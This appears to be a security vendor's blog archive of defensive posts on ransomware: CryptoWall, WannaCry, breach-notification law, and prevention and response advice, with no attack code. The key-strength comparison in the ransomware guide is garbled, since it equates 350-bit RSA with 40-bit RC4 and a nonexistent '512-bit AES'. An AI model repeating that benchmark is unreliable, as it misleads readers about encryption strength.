Tag Archives: ransomware

The State of CryptoWall in 2018

office building lit up at night

CryptoWall and its variants are still favorite toys of the cybercriminals that want your Bitcoin. In fact, according to the 2018 Verizon Data Breach Investigation Report, ransomware incidents now make up about 40% of all reported malware incidents! Some reports say CryptoWall 3.0 has caused over 325 million dollars in damages since it first came on the scene.

CryptoWall first appeared in the wild around 2014: since then, cybercriminals have updated and iterated on it several times to make it even harder to detect and remove.

The CryptoWall virus is cheap and easy to use, spreads fast, and people continue to pay the ransom hoping to get their files back. (Tl;dr: Don’t.) It’s important to maintain constant vigilance to protect data from the CryptoWall virus and all its variants – along with all types of cyberattacks.

What is CryptoWall?

CryptoWall is a particularly nasty form of ransomware. It does much more than just encrypt your files and prompt you to pay for the key: it tries to hide inside the OS and adds itself to the Startup folder. Worse still, CryptoWall deletes volume shadow copies of your files – making it difficult (or in some cases impossible) to restore your data. And while it’s there, it’ll try to get your passwords and Bitcoin wallets for good measure.

CryptoWall 3.0 is by far the most lucrative version so far. It uses strong RSA-2048 encryption to lock your files and try to get you to pay the ransom.

CryptoWall v4 introduced a new feature to encrypt both the files and the filenames, meaning that you can’t simply look at the filename to check (and restore) if you have a backup. The ransom notes got a lot sassier as well, just to pour salt on the wound of your encrypted data.

CryptoWall v5.1 is the latest version based on the HiddenTear malware. It uses a different AES-256 encryption, which doesn’t follow with the previous versions. It’s possible that the developers used the CryptoWall name, but not any of the original code.

There are several variants of CryptoWall: CryptoDefense is one of those variants, for example. For the most part, you can treat them similarly.

tips to prevent ransomware attacks

How CryptoWall Works

There are several different methods to spread CyptoWall and infect devices:

  • Phishing Email: CryptoWall is most often triggered by the end user via a phishing email. Phishing emails try to trick users into clicking a link which downloads malware onto their computer.
  • Exploit Kits: The next most common attack vector is as part of an exploit kit, which take advantage of security vulnerabilities to deploy malware needed to execute the attack. Known vulnerabilities can be in the operating system, in applications you use, or in websites you visit, like WordPress.
  • Malicious Ads: Cybercriminals purchase or hack internet advertisements to deliver malware to you through your browser. Hacked ads often try to run javascript in your browser to download the malware without you noticing.

NOTE: Code injection is a common hacking technique, and it does not always have to take advantage of a bug or be malicious.

Once it’s on your computer, CryptoWall injects new code into explorer.exe (based on the version of Windows installed) and restarts explorer.exe. This special version of explorer.exe installs malware, deletes the volume shadow copies, disables windows services, and spawns a new svchost.exe process with more injected modules.

If, for some reason, it fails to inject code into explorer.exe, CryptoWall will use svchost.exe to spawn a new explorer.exe it can inject the code into. This instance of svchost.exe is also responsible for network communication to home base, file encryption, and removing the malware once it’s finished.

CryptoWall installs itself into the registry and your startup folder: restarting won’t clear things up – if you don’t remove all of the CryptoWall software while you are in Safe Mode, it will start right back up when you log in again.

CryptoWall needs to communicate with a Command and Control server(C&C) to continue the ransomware attack. The C&C sends CryptoWall the encryption key that it will use to encrypt your files. CryptoWall then runs through all of your files, both locally and on any connected networks, and encrypts your most personal data, for example, your documents, presentations, code, music files, and pictures, music files, and pictures.

The encryption locks the contents of your files, and the only way to get them back is with the encryption key.

filetypes vulnerable to cryptowall encryption

What CryptoWall Tells You to do

Once the encryption is complete, you’ll get a ransom note with instructions on how to make payment: often about $1000 worth of Bitcoin. After the ransom note is issued, the malware deletes itself.

The attackers might offer to decrypt a file or two for free to demonstrate good faith: don’t fall for it. There is no guarantee that you will get your files back: only 19% of users that pay the ransom get their files back.

How to Protect Against CryptoWall?

It’s unlikely that you’ll get your files back: in this case (and most ransomware cases), prevention is better than a cure.

Tips to prevent (or disarm) potential ransomware attacks:

  • Keep your computer patched and up to date
    • Malware uses known vulnerabilities in software to move to new computers. If you leave those vulnerabilities unpatched, you’re effectively leaving an open door for the cybercriminals to enter. If you keep the OS and all of your applications patched to the latest releases, you stand a better chance of avoiding malware infections.
  • Use an anti-virus scanner
    • Anti-virus solutions, when updated regularly, can protect you from several kinds of malware attacks. They quarantine known malware programs and prevent them from executing
  • Use a firewall
    • A local firewall can protect you from some connections that malware uses, like to the Command and Control server. The CryptoWall ransomware, in particular, depends on a connection to home base to continue the attack. A local firewall may be able to prevent the malware from making that connection and killing the attack.
  • Don’t click the links
    • Don’t click links or download files from suspicious emails. If you click a malicious link or download a malicious file, you’re inviting the cybercriminal and their malware into your home.
  • Practice safe browsing habits
    • Make sure your browser is up to date, use the most encryption you can, and turn off ads and JavaScript by default. Be selective in what ads you allow to run – and make sure those are from trusted sources
  • Back up your files
    • Always keep a backup copy of your files. It works for a hard drive failure or for ransomware. There are plenty of online cloud storage options of varying security levels and cost. You can also setup a local SAN or USB hard drive to back up your important files.

If CryptoWall slips past your defenses and infects your computer, remove CryptoWall before you use your computer again:

  1. Boot your computer into Safe Mode with Networking
  2. If you have a recent and clean System Restore point, you can restore, if not:
  3. Download and install a malware removal application.
  4. Run malware removal app and scan all of your files

If you’re planning an enterprise-wide security strategy to protect against ransomware attacks, there are a few other items to consider on top of the end user items above.

Maintain a least privilege model: When you maintain a least privilege model, users only have access to the files absolutely necessary to do their job – and if hit by CryptoWall, the ransomware can only encrypt those files. By enforcing a least privilege model, you’re limiting the scope of the ransomware attack by a lot. And with a good backup plan, it’s a simple recovery process.

Leverage security analytics to protect your files from ransomware: Varonis monitors your enterprise data stores, mailboxes, proxies, DNS, and VPNs – with threat models specifically designed to catch ransomware attacks in progress.

A ransomware attack can be devastating to an organization: lost productivity, potentially leaked, stolen, or lost data, recovery fees and resources, and more. Get a custom demo to see how we can protect your valuable data and help stop CryptoWall infections.

North Carolina Proposes Tougher Breach Notification Rules

North Carolina Proposes Tougher Breach Notification Rules

If you’ve been reading our amazing blog content and whitepaper on breach notification laws in the US and worldwide, you know there’s often a hidden loophole in the legalese. The big issue — at least for data security nerds — is whether the data security law considers mere unauthorized access of personally identifiable information (PII) to be worthy of a notification.

This was a small legal point until something called ransomware came along.

You have heard of ransomware, right?

It’s that low-tech, but deadly malware that accesses data and encrypts it. To get the data back, the victim has to send a couple of bitcoins to the digital extortionists.

Last year ransomware had more than a few high-profile victims in the US, as well as, of course, across the globe.

But at the US state level, the difference between access alone and access and acquisition — the legal verbiage for copying — in a notification law determines whether the breach is to be reported to local authorities.

Based on my own research, I could only find a few states for which a ransomware attack would have to be reported locally. I should add that even for states that allow for just unauthorized access of PII, there’s often an additional “harm threshold” to the consumer—financial or credit risk, for example— that would have to be met, and so would rule out a pure ransomware attack in which the data wasn’t copied.

After factoring this in, I found only three states for which a ransomware attack ipso facto  I finally get to use that phrase! — would require a notification: New Jersey, Connecticut, and Virginia.

You can look through these charts prepared by some law firms for yourself, and if you come up with other candidates, let me know!

North Carolina: Laboratory of Democracy!

But wait, a legislator in the great state of North Carolina along with the attorney general last month proposed a change to the statutory language defining a breach.

This tweak moves NC from a state that considers a breach to be unauthorized access and acquisition — see section 75-61 (14) of its statutes — to unauthorized access or acquisition.

Now NC joins the aforementioned club for which ransomware attacks will by themselves force companies to notify authorities and consumers.

The new law will also change the time window in which the data breach will have to be reported after discovery. Searching through a huge PDF table of state breach laws, I can say most if not all states ask that a breach be reported “without unreasonable delay.”

Obviously, these words can be subject to interpretation. The proposed NC law instead sets the time limit to just 15 days.

I’m not aware of any other state that has a specific deadline.

The new law also adds consumer-friendly language that makes credit freezes — remember the outcry after Equifax — free upon request. Up to five years of credit monitoring will also be free of charge.

The law is supposed to tighten the rules on fines as well.

We’ll have to wait for the legislation to be reviewed and approved before we have the final legal details.

We’ll keep you posted.

North Carolina Has Lots of Breaches

On looking at their 2017 annual breach report produced by their Department of Justice, I was surprised to learn that over 1000 breaches were reported in this state alone.

That’s an incredibly large number. For comparison purposes, take a peek at California’s breach report for the years 2012- 2015. The incident counts are dramatically smaller— 178 in 2015.

I’m not sure what explains the difference.  But perhaps NC clearly has lots of law-abiding businesses, especially consumer-facing ones holding PII.

By the way, the current NC law covers an extensive list of identifiers, not only the usual social security, driver’s license, and account numbers, but also PINs, online passwords, digital signatures, and email addresses. This broad PII definition may have something to do with the NC data breach reporting spike we’re seeing.

In any case, if you combine their generous list of PII and the newer  breach notification rules, then you’ll have to admit that NC has upped its digital security game and may even be number one, moving past the formidable California and its tough breach law.

And of course, go Wolfpack.

What to be a legal eagle amongst your IT security peers when it comes to breach notification laws and ransomware? Download our comprehensive white paper on this fascinating subject!

Ransomware Guide and Protection

Ransomware Guide and Protection

What is Ransomware?

Ransomware is malware that encrypts a victim’s data, extorting a ransom to be paid within a short time frame or risk losing all his files – has been around for quite some time. In 1989 the first known ransomware, dubbed the AIDS Trojan,  infected 20,000  floppy diskettes –remember those? The diskettes supposedly contained AIDS information on the virus and were handed out during a conference. Upon loading the DOS-based software from the disk, the program counted the number of times the computer was rebooted. Once it reached 90, it would hide the directories, encrypt the names of the files and requested $189.00 to decrypt the files.

How Ransomware Works

Ransomware works by marrying three separate functions:

1. Distribution

Different ransomware strains spread via different means. This may include any combination of drive-by malware ads, spreading via document macros, or leveraging operating system or application vulnerabilities.

2. Holding Data Hostage

Similiarly, each ransomware strain has a different method of removing data from the infected system’s control. In many cases, the data is actually encrypted, but it is just as likely that it’s deleted and a file of garbage bit left in its place.

3. Digital Payment

Once the files are out of the users’ control, payment of some kind is requested. While Bitcoin (and other cryptocurrencies) are often used as a direct form of payment, indirect methods of payment like deliberately spreading the ransomware to within a company, downloading a digital good or other payments in kind have also been reported.

Together, these three functions define any strain of malware.

Who is the Target of Ransomware?

Most ransomware reports are of large companies that have been brought to their knees by a ransomware attack. However in most cases ransomware spreads indiscriminately.

It is an equal opportunity attack affecting businesses of all sizes, government agencies and personal computing devices indiscriminately.

Ransomware is a means of monetizing a vulnerability found in an organization’s application or network infrastructure. Who’s the target? Everybody.

Ransomware Today

Ransomware has evolved from its early sneaker-net roots, leveraging the Internet and email to spread to different computers. However, it still follows a predictable script, not all that different from the original AIDS Trojan. After entering our networks via a phishing attack, files get encrypted, and the user sees a notification with instructions on how to submit bitcoins in order to decrypt files.

Unfortunately, ransomware attackers have seen how lucrative ransom payments can be. With each attack worth hundreds to thousands of dollars or more, they’ve become even more ambitious with the amount they’re demanding, and how they’re demanding it.

How’s this for ambition: some attackers, even after you’ve paid them the ransom, only partially unlock the files in an effort to demand even more from vulnerable businesses. In one case, a hacker even demanded a ransom as high as one million dollars.

They’re also pushing the boundaries to see how quickly they’re able to extort from unprepared individuals and organizations. Recently, we were introduced to a different attack vector with WannaCry. Instead of a phishing attack, attackers used the NSA’s ETERNALBLUE exploit, allowing it to spread peer-to-peer within an organization, impacting vulnerable Windows machines – laptops, desktops, tablets, and servers.

The result? WannaCry was the fastest and largest ransomware attack we’ve seen so far. However, some security experts are already debating whether the latest NotPetya attack is even deadlier than WannaCry.

By experimenting with how an attack is released, how much to extort, the intensity and velocity in which they spread harm, hackers advance their knowledge base, changing how they develop new strains as well their attack vector.

What hasn’t changed is that it is still possible to detect and prevent a zero-day ransomware attack – that’s according to a Northeastern University ransomware research paper.  In Cutting the Gordian Knot: A Look Under the Hood of Ransomware Attacks, this research team analyzed 1,359 ransomware samples between 2006 and 2014, and found that a “close examination on the file system activities of multiple ransomware samples suggests that by… protecting Master File Table (MFT) in the NTFS file system, it is possible to detect and prevent a significant number of zero-day ransomware attacks.”

Bitcoin and Ransomware

Bitcoin is often associated with ransomware because attackers typically request payments to be submitted in that form of currency. But what exactly is bitcoin?

Bitcoin is a cryptocurrency that with some effort lets you semi-anonymously buy goods and services. You can send bitcoins digitally using a mobile phone app or computer. It’s not quite as easy as swiping a credit card, but removes a large amount of risk from the receiver.

Bitcoins are stored in a digital wallet, which resides in the cloud or on a user’s computer. It’s similar to a bank account, but they’re not insured by the FDIC. Also, bitcoins aren’t tied to any country, subject to regulation, and there are no credit card fees.

Each bitcoin transaction is on a public log. Names of buyers and sellers are anonymous – only their wallet IDs are revealed. And it allows buyers or sellers do business without easily tracing it back to them. As a result, it’s become a popular choice for cybercriminals to choose bitcoin as a form of payment. To evade identification, many bitcoin addresses used by cybercriminals have no more than 6 transactions.

To make a bitcoin payment, victims are often alerted to download anonymous browsers, such as Tor2web or Torproject, in order to visit a URL hosted on anonymous servers. Tor (The Onion Router) makes it difficult to trace the location of the server or the identity of its operators.

Ransomware: Should You Pay?

The short answer is: it depends.

But Some Say, Yes

At a Cybersecurity Summit, Joseph Bonavolonta, the Assistant Special Agent in charge of the FBI’s CYBER and Counterintelligence Program said, “To be honest, we often advise people just to pay the ransom.”

He explained, “The success of the ransomware ends up benefitting victims: because so many people pay, the malware authors are less inclined to wring excess profit out of any single victim, keeping ransoms low. And most ransomware scammers are good to their word. You do get your access back.”

If you pay, the FBI stated that most ransomware payments are typically between $200 and $10,000.

But there have been instances where the payment has been much higher. In 2014, the City of Detroit’s files were encrypted and the attackers demanded a ransom of 2,000 bitcoins, worth about $800,000. Luckily, the ransom was not paid because the database wasn’t used or needed.

There might be times when you’re faced with other considerations. The Tennessee Dickson County Sheriff’s Office paid $622.00 in bitcoin to hackers who encrypted the department’s criminal case files, making them inaccessible to investigators. Detective Jeff McCliss said, “It really came down to a choice between losing all of that data – and being unable to provide the vital services that that data would’ve assisted us in providing the community versus spending 600-and-some-odd dollars to retrieve the data.” The department was lucky; it got back access to its files.

Thou Shall Not Pay

Some security experts disagree with Mr. Bonavolonta’s remarks and urge you not to pay the ransom because there’s no guarantee that even after you pay the ransom, your files will return to its original state. Moreover, paying perpetuates an ongoing problem, making you a target for more malware.

In 2016 it was reported that a Kansas hospital hit with ransomware paid the ransom in hopes of getting back to business as soon as possible, but the payment only partially decrypted their files. Instead, the cybercriminals demanded more money to decrypt the rest. As a result, the hospital refused to pay the second ransom because it was no longer “a wise maneuver or strategy.”

Worse, if you get infected with a defective strain such as Power Worm you won’t get your files back regardless what you do. Even with the intent of paying the ransom, this attack will inevitably destroy the victim’s data during the encryption of their data.

Alternatively, if you encounter an attack like NotPetya where the intention wasn’t about financial gain, but destroying data, even if you stockpile bitcoins to pay the ransom, you won’t get your data back.

The Department of Homeland Security has also advised victims not to negotiate with hackers. Conflicting advice has prompted a debate about whether the FBI is encouraging behavior that will lead to more hacking.

In a Wall Street Journal interview, FBI spokeswoman Kristen Setera declined to say if FBI officials recommend paying a ransom to hackers, as Mr. Bonavolonta stated.

Why You Should Work With Law Enforcement

John Carlin, former Assistant Attorney General for the U.S. Department of Justice’s National Security Division acknowledged in a recent podcast that there remains confusion at the FBI on whether or not you should pay.

He confirmed that the FBI officially does not encourage paying a ransom. However, similar to a kidnapping case, that doesn’t mean that if you go to law enforcement, that they’re going to recommend you not to pay.

But one thing is for certain. If you do go to law enforcement, they will be able to provide a few insights that you wouldn’t otherwise know.

First, law enforcement can provide you with valuable information. Carlin advised “If it’s a group they’ve been monitoring, they can tell you…whether they’ve seen that group attack, other actors, before, and if they have, whether if you pay they’re likely to go away or not. Because some groups just take your money and continue.”

Secondly, he also identified a major benefit to working with law enforcement – you’ll be hedging against the risk of inadvertently paying off a terrorist when you pay the ransom. He advised, “You can end up violating certain laws when it comes to the Office of Foreign Assets Control by paying a terrorist or another group that’s designated as a bad actor. But more importantly, you do not want to be in a situation where it becomes clear later that you paid off a terrorist.”

But Before You Pay, Find Out If There’s A Decryption Tool

Finally, if you are faced with managing a ransomware attack, go online to see if a decryption tool exists. If you’re able to find the keys, there’s no need to pay. Sometimes, when the police and security experts investigate cybercriminal activity, they can potentially obtain decryption keys from malicious servers and share them online, like for CoinVaultTeslaCrypt, or the popular CryptoLocker.

Keep in mind, whether or not you pay the ransom, the cumulative cost of a ransomware attack is typically greater than the ransom. The cost to the brand, loss of productivity, legal fees, etc all accrue once the attack vector is triggered.

Perhaps another way that might help you decide is to understand the type of ransomware you’re dealing with.

Ransomware Types

Let’s get started. In Cutting the Gordian Knot: A Look Under the Hood of Ransomware Attacks, researchers identified three major types: encryption, deletion, and locking.


CryptoLocker and CryptoWall have a reputation for being strong encryption ransomware. Encryption is the process of applying an algorithm (also known as ciphers) to data so it is unintelligible to anyone. And to decrypt the data, you’ll need keys. There are two types: symmetric and public.

Symmetric Keys

Advanced Encryption Standard (AES), Rivest Cipher 4 (RC4), and Data Standard Encryption Standard (DES) are examples of a symmetric-key algorithm. With symmetric, the same key is used for both encryption and decryption. It’s only effective when the symmetric key is kept secret by the two parties involved.


Public Keys (Asymmetrical Key)

Rivest, Shamir, & Aldeman use two different keys in their famous RSA algorithm. A public key that everyone has access to, and  a private key that is controlled by the person who you wish to communicate with.


Strength of an Encryption

To understand the strength of the encryption, you have to look at both the type of encryption being used –whether symmetric or public/asymmetric – and the key length.

Two important facts: the longer the key, the stronger the encryption,  and key length is measured in bits.

Breaking an Encryption

For a symmetric algorithm, you’ll need a couple of hours of computer time for something like a 20-bit key or years for a 128-bit key (2128 = 340282366920938463463374607431768211456 possible keys of 128-bits)

For a public key algorithm, a key length of 32-bits would only require 232 combinations.  Even a 512-bit can be easily broken (within a few months), but 2,048-bit is far harder.

Comparing public and symmetric keys can be confusing. Here’s a rough benchmark:  a 350-bit RSA key is roughly considered the same strength to 40-bit RC4, and 512-bit AES.

The wonky reasons for these differences in key-breaking speeds has to do with the fact that in RSA, you have to factor a number—don’t ask!

Ransomware Encryptions

The first ransomware variants used a symmetric-key algorithm and eventually upgraded to public-keys. Today, more advanced ransomware use a combination of symmetric and public.

Most cybercriminals probably wouldn’t use a public key to encrypt large file system because it is much slower than a symmetric key encryption. And taking too long to encrypt files could thwart the ransomware operation before the encryption process is fully completed.

So a better idea is to use symmetric techniques to quickly encode the file data, and asymmetric to encode the key.  In CryptoLocker, for example, AES (symmetric) was used for file encryption and RSA (public) for AES key encryption.

Another blend you might see in the near future is elliptical curve cryptography (ECC) and RSA. ECC is described as the next generation of a public key, in which you can create faster, smaller, and more efficient cryptographic keys. Some researchers say that ECC can yield a level of security with a 164-bit key that other systems require a 1,024-bit key to achieve.


With deletion, attackers threaten and warn: any of your attempts to decrypt files would only result in an “irrevocable loss of your data.” Or if you don’t pay, the files get deleted. Popular examples of deletion include Gpcode and FileCoder.­

Typically when we delete something, we wipe it off the disk. But in analyzing all the samples, the researchers learned that lots of data remained on disk because attackers were lazy, often choosing the easiest path. However, they’re also very clever. The researchers found that while the NTFS Master File Table indicated that files were deleted, the files were actually still on disk, so recovery is potentially possible. However, depending on the strain and how ransomware evolves, there’s also the potential that your data might be destroyed.


With locking, attackers create a new login screen or html page that makes it appear as though a law enforcement agency has taken over the computer. They display a warning pertaining to laws such as copyrighted materials or child pornography. Or they might disable other components, typically keyboard shortcuts. Examples include Winlock and Urausy.

Ransomware Attack Vectors

You can bet that new types of ransomware are constantly being developed, including attack vectors that aren’t like the usual garden variety, such as malvertising, ransomworm, and peer-to-peer file transfer programs.

As I was once reminded by a security pro, attacks don’t need to be complicated. It can be something as simple as a link in an email or an email attachment and that’s what most ransomware strains rely on to get in your network. Therefore curious individuals who can’t resist clicking on links or opening attachments would benefit from security awareness training.

Let’s not forget the devastating effects of WannaCry and NotPetya, so make sure your software is up-to-date so that your security updates are also up-to-date!

We’re also seeing more instances of Ransomware-as-a-Service, where hackers sell their malware to other cybercriminals, increasing the frequency and reach of ransomware. Ransomware authors can enlist anyone to sign up and everyone would earn a percentage of the profits. To combat this problem, organizations might benefit from a few mitigation strategies, which we’ll cover later.

What to Do After You’ve Been Infected with Ransomware

Most people don’t realize they’ve been infected until their screen displays a ransom note, notifying them that their files have been encrypted.

If you discover that your computer has been infected:

  1. Shutdown your computer or disconnect from the network.
  2. If you’ve decided against paying the ransom, scan your computer with an anti-virus or anti-malware program and let it remove everything.
  3. If you have a backup, restore your files.
  4. If you don’t have a backup, check if it’s possible to identify the ransomware strain from the encrypted files or note. If it is and a decryption or recovery tool is available, use that.
  5. Identify how the infection occurred and what you need to do prevent a recurrence.

One caveat is that backups aren’t 100% fail safe. Some ransomware strains will either encrypt your backups or worse, hide in your backups so that after you restore files they will attack again.

However, if you decide to pay the ransom, you have our sympathy! We empathize and understand what a pain it must have been and hope that once you pay, all your files get decrypted. Don’t forget to scan your computer with an anti-virus or anti-malware program and let it remove everything. Also, review the mitigation methods below!

Ransomware Removal

The term ransomware defines a group of malware by its behavior. As such, it’s difficult to apply a one size fits all strategy to remove an infection. In some cases, like where weak or missing API credentials are compromised, there may not actually be an infection. An example of this occurred when tens of thousands of MongoDB databases had their data encrypted remotely as they had failed to change the default password 10.

The best policy to pursue is one of identification and then mitigation.

Ransomware Mitigation Methods

Monitor File System Activity

After looking at 1,359 ransomware samples, the Northeastern University researchers learned that it is possible to stop a large number of ransomware attacks, even those using deletion and encryption capabilities.

Significant changes occur in the file system (i.e., large number of deletions in the log) when the system is under attack. By closely monitoring the file system logs and configuring your monitoring solution to trigger an alert when this behavior is observed, you can detect the creation, encryption, or deletion of files.

User Behavior Analytics or Signature-Based?

Some IT pros have turned to endpoint security solutions in the hope that it will detect and stop crypto-malware. However, the industry is catching on to the fact that, as one observer put it, “signature-based antivirus software that most organizations still rely on to defend them can’t cope with modern attacks.”

A recent CIO article described the drawback best:

 “… while a signature-based approach reduces the performance hit to the systems on which it runs, it also means somebody has to be the sacrificial sheep. Somebody has to get infected by a piece of malware so that it can be identified, analyzed and other folks protected against it. And in the meantime, the malefactors can create new malware that signature-based defenses can’t defend against.”

Bottom line: endpoint security solutions can’t block unknown ransomware variants by, for example, blacklisting connections to a current (but outdated) list of C&C servers. They’re also bound to a device/user/process, and so don’t provide any anti-heuristics or debugging techniques.

Instead, User Behavior Analytics (UBA) has become an essential go-to ransomware prevention measure. It’s also been known to detect zero-day ransomware attacks as well.

Defending the inside from legitimate users is just not part of the equation for perimeter-based security, and hackers are easily able to go around the perimeter and get inside. They entered through legitimate public ports (email, web, login) and then gain access as users.

Once in, cybercriminals have become clever at implementing a ransomware attack that isn’t spotted by anti-virus software.

In fact, to an IT admin who is just monitoring their system activity, the attackers appear as just another user.

And that’s why you need UBA!

UBA really excels at handling the unknown. In the background, the UBA engine can baseline each user’s normal activity, and then spot variances and report in real time – in whatever form they reveal themselves. For instance, an IT admin can configure a rule to, say, spot thousands of “file modify” actions in a short time window.

UBA takes a cross-system approach, too. i.e., it can notice abnormal file behavior combined with weird email actions combined with weird login behavior (from Active Directory). Think of UBA as File System Monitoring 2.0 – and keep in mind that the best UBA benefits from having the most context.

Create Honeypots

Cybercriminal may avoid encrypting all files and start by encrypting recently accessed files. Create a decoy by creating fake files and folders and monitor regularly.

This is also a good method for organizations that don’t have an automated solution to monitor file access activity. That also means you might be forced to enable file system native auditing. However, it, unfortunately, taxes your monitored systems. Instead, prioritize sensitive areas and set up a file share honeypot.

A file share honeypot is an accessible file share that contains files that look normal or valuable, but in reality are fake. As no legitimate user activity should be associated with a honeypot file share, any activity observed should be scrutinized carefully. If you’re stuck with manual methods, you’ll need to enable native auditing to record access activity, and create a script to alert you when events are written to the security event log (e.g. using dumpel.exe).

Least Privilege Model

Another approach is to control access to data and work towards achieving the least privilege model.  Your goal is to reduce exposure quickly by removing unnecessary global access groups from access control lists. Groups such as “Everyone,” “Authenticated Users,” and “Domain Users” when used on data containers (like folders and SharePoint sites) can expose entire hierarchies to all users in a company.  In addition to being easy targets for theft or misuse, these exposed data sets are very likely to be damaged in a malware attack. On file servers, these folders are known as “open shares”— where both file system and sharing permissions are accessible via a global access group.

Ransomware Examples

With the rise of ransomware toolkits (prepacked bits of code for the various ransomware functions) it’s become harder to differentiate between Ransomware strains.

CryptoLocker One of the earlier and quintessential ransomware strains. Among the first to demand payment via Bitcoin. Distinguished by it’s good “customer service” and the fact it did actually decrypt your files.
Petya/NotPetya Strain was spread through a vulnerability in a web based accounting system used by Eastern European companies. Notable becasuse it affected the boot processess, preventing users from logging in.
PUBG PUBG (Players Unknown’s Battlegrounds) is a popular online game. One enthusiastic supporter took some off the shelf ransomware and made the unlock key dependent upon playing an hour of the game.

Why did last Friday’s ransomware infection spread globally so fast?

Why did last Friday’s ransomware infection spread globally so fast?

Quick ransomware background

Ransomware is a type of malware that encrypts your data and asks for you to pay a ransom to restore access to your files. Cyber criminals usually request that the ransom be paid in Bitcoins: the #1 cryptocurrency (basically a distributed ledger) which can be used to buy and sell goods. By nature, Bitcoin transactions (e.g. ransom payments) are very difficult to trace.

Historically, most ransomware infections use the attack vector – how they get in – of social engineering (like clickbait from a social media platform – think cute kitty pics on Facebook or Twitter) or email phishing campaigns, which contain attachments or links to a website. The end result is that a malicious payload gets a foothold on a machine inside a corporate network. Unfortunately, all of those next generation perimeter defenses that organizations spend good money on are not that difficult to bypass in order to get inside.

Once inside, most ransomware will scan the internal network to see which servers host file shares, attempts to connect to each share, encrypt its contents, and then demand a ransom be paid to regain access to the now encrypted files. End users can usually access way more data than they should be able to: either through wide open permissions or by accumulating permissions over the course of their employment at their company. Think for a minute just often you’ve stumbled across a folder or files which you know you shouldn’t be able to access. Access controls are out of control. In this case, IT is typically blind because of the sheer complexity of file system permissions.

Good to know, but what was different last week?

Without going too much into the technical details, I can tell you that the code behind the biggest ransomware outbreak in history isn’t actually all that special. It’s a type of cryptoworm: a self-propagating malicious form of malware. That means that once it gets a foothold, it can spread autonomously without the need for someone to remote control it.

Normally, ransomware targets unstructured data hosted on file shares – this ransomware, however, did not discriminate.

In April, several hacking tools created by the NSA were leaked online. These hacking tools exploit vulnerabilities in hardware and software so that they can hack into or move laterally around a computer network.

WannaCry ransomware (also known as WCry / WanaCry / WannaCrypt0r / WannaCrypt / Wana Decrypt0r) – the type responsible for last Friday’s attack – went a few steps further: once it got onto even a single machine within a corporate network, it did the following:

  • Looped through any open RDP (Remote Desktop) sessions, to encrypt data on the remote machine
  • Sought out any vulnerable* Windows machines – endpoints (laptops/desktops/tablets) and servers using Microsoft vulnerabilities
  • Used the traditional approach of going after file shares directly from the endpoint

*The particular vulnerability that made the difference last week was in the Microsoft SMBv1 file sharing protocol, which was used to hop from machine to machine encrypting data – like a spider web effect. Most internal servers are separated on internal networks so that end users can’t access them. The cryptoworm would need to hit just one internal server (e.g. a file server) and from there it would target whatever vulnerable servers that file server can access. This allowed it to quickly traverse entire networks, effectively crippling many of them. Like many cryptoworms, it’s self-propagating and so replicates itself and searches out to other vulnerable hosts/computer networks worldwide.

The truth is that the worldwide infection could have been much worse if not for the quick thinking of a security researcher. @MalwareTechBlog spotted that the malware code was connecting out to a nonsensical domain, which was not registered. This call out was hard-coded in case the creator wanted to stop it and likely also to help avoid IDS/IPS sandboxing techniques. If the request comes back showing that the domain is live, the “kill switch” kicks in to stop the malicious part of the code from executing – effectively stopping the malware in its tracks. @MalwareTechBlog, acting on a hunch, registered the domain name and was immediately registering thousands of connections every second. The result was that he stopped what could have been a much wider spread infection.

The bad news is that new versions of the code are already in development: https://www.bleepingcomputer.com/news/security/with-the-success-of-wannacry-imitations-are-quickly-in-development/

Lessons Learned

Microsoft released a patch (software code update to fix vulnerabilities) for this particular SMBv1 vulnerability back in March. The sad truth of the matter is that proper vulnerability patch management processes would mean that most organizations would not have been so badly affected.

That’s not to say that vulnerability patch management processes are enough coverage for ransomware. Nor are backups, since some ransomware will hide in your backups so that after you restore files they will simply attack again.

There is no one stop shop for stopping ransomware infections or any cyber security threat for that matter. Security is all about risk reduction – and requires a layered approach with controls in place at each layer while leveraging solutions to automate processes wherever possible. If any organization says that they’re 100% safe from cyber-attacks, then they’re either delusional or telling you porky pies!

🚨 Massive Ransomware Outbreak: What You Need To Know

🚨 Massive Ransomware Outbreak: What You Need To Know

Remember those NSA exploits that got leaked a few months back? A new variant of ransomware using those exploits is spreading quickly across the world – affecting everyone from the NHS to telecom companies to FedEx.

Here’s What We Know So Far

Ransomware appears to be getting in via social engineering and phishing attacks, though vulnerable systems may also be at risk if TCP port 445 is accessible. Unlike most ransomware that encrypts any accessible file from a single infected node, this ransomware also moves laterally via exploit (i.e., EternalBlue) to vulnerable unpatched workstations and servers, and then continues the attack. Unpatched windows hosts (Vista, 7, 8,10, server 2008, 2008 R2, 2012, 2012 R2, and 2016) running SMB v1 are all vulnerable.

Infected hosts are running strains of ransomware, such as Wanna Decrypt0r (more below) that encrypts files and changes their extensions to:

  •  .WRNY
  • .WCRY (+ .WCRYT for temp files>
  • .WNCRY (+ .WNCRYT for temp files)

The Ransomware also leaves a note with files named @Please_Read_Me@.txt, or !Please_Read_Me!.txt, and will display an onscreen warning.

Here’s What You Can Do

MS17-010, released in March, closes a number of holes in Windows SMB Server. These exploits were all exposed in the recent NSA hacking tools leak. Exploit tools such as EternalBlue, EternalChampion, EternalSynergy and EternalRomance (all part of the Fuzzbunch exploit platform) all drop DoublePulsar onto compromised hosts. DoublePulsar was created by the NSA and is basically a malware downloader, which is used as an intermediary for downloading more potent malware executables onto infected hosts.

If you’re an existing DatAlert customer, you can set up office hours with your assigned engineer to review your threat models and alerts. Don’t have DatAlert yet?  Get a demo of our data security platform and see how to detect zero-day attacks.

DatAlert Customers

If you’re a DatAlert Analytics customer, the threat model “Immediate Pattern Detected: user actions resemble ransomware” was designed to detect this and other zero-day variants of ransomware; however, we also strongly recommend that you update the dictionaries used by DatAlert signature-based rules. Instructions for updating your dictionaries are here: https://connect.varonis.com/docs/DOC-2749

If for some reason you can’t access the connect community, here is how to update your dictionaries to include the new extensions for this variant:

Open the DatAdvantage UI > Tools > Dictionaries > Crypto files (Predefined)

Open the DatAdvantage UI > Tools > Dictionaries > Encrypted files (Predefined)



The Malware exploits multiple Windows SMBv1 Remote Code vulnerabilities:

Windows Vista, 7, 8,10, server 2008, 2008 R2, 2012, 2012 R2, 2016 are all vulnerable if not patched and SMBv1 Windows Features is enabled.


Ransomware strains

WCry / WannaCry / WannaCrypt0r / WannaCrypt / Wana Decrypt0r

This outbreak is version 2.0 of WCry ransomware which first appeared in March. Until this outbreak, this ransomware family was barely heard of. Though likely spread via phishing and social engineering attacks, if tcp port 445 is exposed on vulnerable windows machines, that could be exploited using the Fuzzbunch exploit platform.

Other helpful links


